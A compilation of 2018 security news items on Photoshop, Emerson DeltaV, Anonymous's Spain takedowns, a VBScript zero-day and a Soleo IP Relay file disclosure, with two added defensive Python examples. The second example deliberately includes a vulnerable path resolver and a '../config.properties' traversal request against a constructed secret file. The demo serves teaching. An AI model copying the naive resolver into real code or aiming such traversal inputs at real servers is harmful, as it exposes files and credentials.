“Adobe has released updates for Photoshop CC for Windows and macOS. These updates resolve critical vulnerabilities in Photoshop CC 19.1.5 and earlier 19.x versions, as well as 18.1.5 and earlier 18.x versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Adobe addressed both flaws with the release of versions 19.1.6 and 18.1.6.

The vulnerabilities affect Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions.


The Adobe Patch Tuesday for August 2018 addressed a total of 11 vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader.

None of the patched vulnerabilities have been exploited by attackers in the wild.

Flaws in Emerson Workstations Allow Lateral Movement
21.8.2018 securityweek ICS

Researchers working for two industrial cybersecurity firms have discovered several critical and high severity vulnerabilities in Emerson DeltaV DCS Workstations. The vendor has released patches that should resolve the flaws.

Emerson DeltaV Workstations are purpose-built computers specifically designed to run DeltaV applications. According to ICS-CERT, these systems are used worldwide, mainly in the chemical and energy sectors.

An advisory published last week by ICS-CERT reveals that DeltaV DCS Workstation versions 11.3.1, 12.3.1, 13.3.0, 13.3.1 and R5 are impacted by four serious vulnerabilities.

The security holes were discovered by Nozomi Networks, and one of them was independently identified by Ori Perez, security researcher at CyberX.

The most serious of the flaws, based on its CVSS score, is CVE-2018-14793, a stack-based buffer overflow that can be exploited for arbitrary code execution via an open communication port.

Also highly severe is the vulnerability discovered by Perez, CVE-2018-14795, which ICS-CERT described as an improper path validation issue that may allow an attacker to replace executable files.

“We were able to analyze the protocol and issue specially crafted commands in order to achieve remote code execution using that vulnerability,” CyberX VP of Research David Atch told SecurityWeek. “The vulnerability is a result of a coding error, which means that default Windows security mechanisms such as ASLR and DEP won't prevent the remote code execution.”

The two other flaws, also classified as “high severity,” are a DLL hijacking issue that can lead to arbitrary code execution (CVE-2018-14797), and a vulnerability that allows non-admin users to change executable and library files on the affected workstations (CVE-2018-14791).


Exploiting these security holes can allow an attacker to move laterally within the targeted network and possibly take control of other DeltaV workstations, CyberX and Nozomi told SecurityWeek. However, there is currently no evidence of public exploits specifically targeting these flaws.

Exploitation of the vulnerabilities requires access to the targeted workstation, either over the local network or the Internet. However, CyberX says it has not seen any DeltaV workstations directly accessible from the Web.

Moreno Carullo, co-founder and chief technical officer at Nozomi, pointed out that the notorious Triton/Trisis malware also first targeted a workstation.

Emerson has provided patches for each of the affected DeltaV Workstation versions. The company also noted that application whitelisting can block exploitation of most of these flaws as it would prevent files from being overwritten.
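The two lower-rated DeltaV flaws and Emerson's whitelisting advice share one theme: an attacker who can overwrite or plant executables and DLLs on the workstation gets code execution. Where whitelisting is not yet in place, a file-integrity baseline over the application's binaries is a cheap detective control. The following is an added example, not Emerson's, Nozomi's or CyberX's code; it builds a SHA-256 manifest of executables and libraries under a directory, then reports files that were modified, added or removed. The directory layout and file contents are constructed inline for the demo (the real DeltaV install paths are not on the page, so none are used).

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Extensions an attacker would overwrite or plant to hijack execution on a
# Windows workstation (DLL hijacking, replaced service binaries).
MONITORED_SUFFIXES = {".exe", ".dll", ".sys", ".ocx"}


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map each monitored file under root (relative POSIX path) to its SHA-256."""
    root_path = Path(root)
    manifest: Dict[str, str] = {}
    for p in sorted(root_path.rglob("*")):
        if p.is_file() and p.suffix.lower() in MONITORED_SUFFIXES:
            manifest[p.relative_to(root_path).as_posix()] = sha256_of(p)
    return manifest


def verify_manifest(root: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the current tree against a stored baseline.

    'modified' is the DLL-hijack / binary-replacement signal; 'added' catches a
    planted library in a search-path directory; 'removed' catches deletion of a
    protective component.
    """
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario (hypothetical paths, not a real DeltaV layout):
    take a baseline, then simulate an overwritten executable and a planted DLL."""
    root = tempfile.mkdtemp(prefix="workstation-demo-")
    app = Path(root, "bin")
    app.mkdir()
    (app / "Service.exe").write_bytes(b"MZ original service")
    (app / "Helper.dll").write_bytes(b"MZ original helper")
    (app / "readme.txt").write_text("not monitored")  # non-executable, ignored

    baseline = build_manifest(root)

    # The two outcomes the advisory warns about, reproduced in the temp dir only.
    (app / "Service.exe").write_bytes(b"MZ tampered")
    (app / "Planted.dll").write_bytes(b"MZ rogue")

    return verify_manifest(root, baseline)


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be written once from a known-good image, stored off the workstation, and compared on a schedule or on file-change events; whitelisting remains the preventive control, this only tells you after the fact that something changed.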

“To limit exposure to these and other vulnerabilities, Emerson recommends deploying and configuring DeltaV systems and related components as described in the DeltaV Security Manual, which is available in Emerson’s Guardian Support Portal,” ICS-CERT said in its advisory.

Anonymous Hackers Target Spain Sites in Catalonia Protest
21.8.2018 securityweek Hacking

Hackers from the Anonymous collective claimed responsibility for bringing down government websites in Spain on Monday in a protest against Madrid's efforts to block Catalonia's separatist drive.

The sites, which included the official websites of the Constitutional Court and the economy and foreign ministries, went offline on Monday and could still not be accessed by early evening.

Anonymous, a loosely knit group that has attacked financial and government websites around the world, said it orchestrated the shutdowns.

"Hey Spain, we see that you are still hurting the Catalan people. This is not a joke. We will hurt your government as well!," the group wrote in a statement posted on its Twitter feed.

Anonymous temporarily blocked the Constitutional Court's website in October 2017 just as Spain's central government prepared to announce unprecedented measures to seize powers from Catalonia's regional government over its threat to break away from the rest of the country.

The hacker group originated in 2003, adopting the Guy Fawkes mask as its symbol. The mask is a stylised portrayal of an oversized smile, red cheeks and a wide moustache upturned at both ends.

North Korean Hackers Exploit Recently Patched Zero-Day
21.8.2018 securityweek BigBrothers

North Korean hackers are exploiting a recently patched vulnerability in Microsoft's VBScript engine in live attacks, security researchers say.

Tracked as CVE-2018-8373, the bug was identified as a memory corruption issue that would result in remote code execution in the context of the current user. The flaw resides in the manner in which the VBScript scripting engine handles objects in memory in Internet Explorer.

“[A]n attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft said.

Impacting the VBScript engine in the latest versions of Windows, the vulnerability does not affect Internet Explorer 11, as “VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default,” Trend Micro, the security firm that discovered the flaw last month, says.

The security company also notes that the discovered exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution flaw that Microsoft addressed in May.

The method for exploiting CVE-2018-8373 and running shellcode is also similar to the CVE-2018-8174 exploits, which further suggests that the same author is behind both. The creator used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine, Trend Micro says.

Last week, Dustin Childs, communications manager for the ZDI, told SecurityWeek that the similarities between these flaws seem more than coincidental. He also pointed out that further exploits could emerge from the same group.

While Trend Micro did not attribute the attacks to a specific actor, Qihoo 360’s security researchers claim that the North Korean threat actor known as DarkHotel is behind both exploits.

The researchers say the domain name used by the zero-day exploit is the same they observed in May being used for CVE-2018-8174’s exploitation and that it is indeed linked to DarkHotel.

Qihoo 360, which has been tracking DarkHotel for a while, appears confident that this is the threat actor that has been exploiting CVE-2018-8373 since before it was patched.

“Based on our analysis, this vulnerability can be steadily exploited. Moreover, since it is the second VB engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future,” Trend Micro said.

First detailed in 2014, the DarkHotel advanced persistent threat (APT) actor was recently said to be connected to the infamous Lazarus Group. Based on the reuse of code between various malware families attributed to North Korean actors, Intezer and McAfee concluded that most of the malicious tools link back to Lazarus.

Anonymous collective brought down Spain sites to support Catalonia
21.8.2018 securityaffairs Hacking

Anonymous targeted many government websites in Spain to protest against the Government’s efforts to block Catalonia’s separatist wave.
Members of the notorious Anonymous collective claimed responsibility for bringing down several government websites in Spain on Monday to protest against the decision of the government to block Catalonia’s separatist drive.

Anonymous brought down the websites of the Constitutional Court and the economy and foreign ministries on Monday as part of an operation called #OpCatalunya.

Tweet by vanessa junqué, 4:23 PM - Aug 20, 2018:
“#OpCatalunya: New attacks against Spanish Government. Administracion Website and Consejo Transparencia are #TangoDown #Anonymous”
“Hey Spain, we see that you are still hurting the Catalan people. This is not a joke. We will hurt your government as well!,” reads a message published by Anonymous on Twitter.

This isn’t the first time the collective has targeted the Constitutional Court’s website: it did so in October 2017, while Spain’s government was announcing the seizure of powers from Catalonia’s regional government in response to the separatist movement in the region.

Vulnerability in IP Relay Service Impacts Major Canadian ISPs
21.8.2018 securityweek

A recently addressed local file disclosure vulnerability in the SOLEO IP Relay service impacted nearly all major Internet service providers (ISPs) in Canada, a security researcher has discovered.

Also known as telecommunications relay services (TRSs), the IP relays developed by Soleo Communications are available through all major ISPs in Canada.

The cloud-based IP Relay service was launched over half a decade ago to allow hearing-impaired individuals and those with speech disorders to place calls through a TTY (text terminal) or other assistive telephone device.

Because of improper input sanitization, these services exposed sensitive user information, Project Insecurity researcher Dominik Penner discovered.

In a report (PDF) published late last week, the security researcher explains that the security flaw could be abused to determine the layout of the IPRelayApp directory and find the location of the source files on the IP Relay server. All of the discovered files could then be downloaded by an attacker, the researcher says.

The files were found to be classes compiled in Java bytecode, but “a determined attacker would easily be able to convert this directly back to source, compromising source code and other sensitive files,” Penner points out.
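The flaw described above is a classic local file disclosure: a file name taken from the request is joined onto a server directory without validation, so traversal segments walk out of the intended directory and fetch compiled classes and configuration. The following is an added example, not Soleo's code or Penner's proof of concept; it shows a naive resolver beside a hardened one that canonicalises the path and enforces containment, run against a constructed directory layout (the hypothetical web root and config file names are assumptions, not the real IPRelayApp layout).

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple


def naive_resolve(base_dir: str, requested: str) -> str:
    """Vulnerable: joins the user-supplied name onto the base directory with no
    validation, so '../' segments escape the directory the app meant to serve."""
    return os.path.join(base_dir, requested)


class PathTraversalError(ValueError):
    """Raised when a requested path would resolve outside the served directory."""


def safe_resolve(base_dir: str, requested: str) -> str:
    """Hardened: reject absolute paths and NUL bytes, canonicalise both sides
    (symlinks and '..' collapsed), then require the target to stay inside base."""
    if "\x00" in requested or os.path.isabs(requested):
        raise PathTraversalError(f"rejected request: {requested!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath is the robust containment test: a plain startswith() would
    # accept /srv/app-secrets when the base is /srv/app.
    if os.path.commonpath([base, target]) != base:
        raise PathTraversalError(f"rejected request: {requested!r}")
    return target


def serve(base_dir: str, requested: str, resolver=safe_resolve) -> bytes:
    """Read the file the chosen resolver returns; raises on rejection."""
    path = resolver(base_dir, requested)
    with open(path, "rb") as fh:
        return fh.read()


def build_demo_tree() -> Tuple[str, str]:
    """Constructed sample layout (hypothetical): a web root with one public
    file, and a config file holding a password one level above it."""
    root = tempfile.mkdtemp(prefix="relay-demo-")
    webroot = os.path.join(root, "webroot")
    os.mkdir(webroot)
    Path(webroot, "index.html").write_text("<html>public</html>")
    Path(root, "config.properties").write_text("db.password=CONSTRUCTED-SECRET\n")
    return root, webroot


def demo() -> Dict[str, Optional[str]]:
    """Run both resolvers on a benign request and on a traversal request.
    A None value means the request was refused."""
    _root, webroot = build_demo_tree()
    results: Dict[str, Optional[str]] = {}
    for name, resolver in (("naive", naive_resolve), ("safe", safe_resolve)):
        results[f"{name}_index"] = serve(webroot, "index.html", resolver).decode()
        try:
            results[f"{name}_traversal"] = serve(webroot, "../config.properties", resolver).decode()
        except PathTraversalError:
            results[f"{name}_traversal"] = None
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The containment check is the part that matters: denylisting the string `..` is not enough (encoded forms, symlinks and platform-specific separators get past it), whereas comparing canonical paths decides on what the filesystem will actually open. Keeping secrets out of files under any served tree, as the report's finding implies, is the complementary control.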

The source code also includes passwords the servlet uses to communicate with other services and an attacker able to extract these passwords could then either escalate their privileges on the server or abuse the extracted information in social engineering attacks.

“The end result could be escalated to yield remote code execution, though we were not comfortable attempting to do this before getting in contact with the vendor,” the researcher notes.

Working in collaboration with security researcher Manny Mand, Penner discovered that at least ten Canadian ISPs were running the vulnerable instance of Soleo’s IP Relay. Six of these, Penner says, are the largest telecom providers in Canada.

“[W]e have confirmed that a determined attacker (APT/foreign entity) could leverage this vulnerability to steal passwords from configuration files across multiple providers, compromise said providers using the stolen passwords, and then potentially launch a large scale identity theft operation against Canadians,” the researcher says.

An attacker exploiting the vulnerability could compromise over 30 million Canadian records, he said.

The bug was reported to the vendor on July 19 and was confirmed as patched on August 10.